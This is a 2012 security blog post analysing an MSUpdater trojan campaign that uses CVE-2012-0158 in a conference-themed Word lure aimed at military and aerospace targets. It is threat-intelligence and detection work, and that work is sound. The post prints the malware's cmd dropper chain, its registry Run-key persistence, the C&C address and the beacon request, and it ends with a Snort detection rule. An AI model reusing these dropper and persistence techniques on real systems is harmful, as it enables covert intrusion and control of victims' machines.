MSUpdater Trojan found using CVE-2012-0158: Space and Missile Defense Conference

April 23, 2012  |  Jaime Blasco

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against several industries. One of the campaigns which attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims have still a low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

So the victim will show the following document:

The binary created by the shellcode is a dropper that contains the actual malware embedded on a resource. After deciphering the content, it creates the new binary under Documents and Settings{UserName}Local SettingsApplication DataGoogleUpdate.exe and creates the following registry key in order to maintain persistence:

SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN

GoogleUpd SZ “C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\GoogleUpdate.exe”

The payload is detected as BKDR_FYNLOS.SM1 and has been used in order similar attacks in the past. The malware connects to the  C&C server with address 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)

Host: 204.13.66.119

Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded version of the machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago.  Once again the group behind these attacks are using conference related subjects as a lure to target these industries.

You can use the following snort rule already present on Emerging Threats to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:“ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1”; flow:from_client,established; content:”/search”; http_uri; content:”?h1=”; fast_pattern; http_uri; content:”&h2=”; distance:0; http_uri; content:”&h3=”; distance:0; http_uri; content:“User-Agent|3a| Mozilla/5.0 (compatible|3B|”; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)

Share this with others

Get price Free trial